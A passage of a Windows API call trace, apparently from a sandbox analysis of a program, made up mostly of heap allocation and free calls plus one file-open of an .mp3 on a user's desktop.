0x43e2590 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0123.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0123.113] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0123.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.115] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0123.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0123.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0123.116] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0123.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0123.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0123.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\I4IMK8uPkmw_W.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i4imk8upkmw_w.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0123.118] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.119] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.120] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0123.120] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0123.120] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0123.121] HeapFree (in: hHeap=0x1780000, 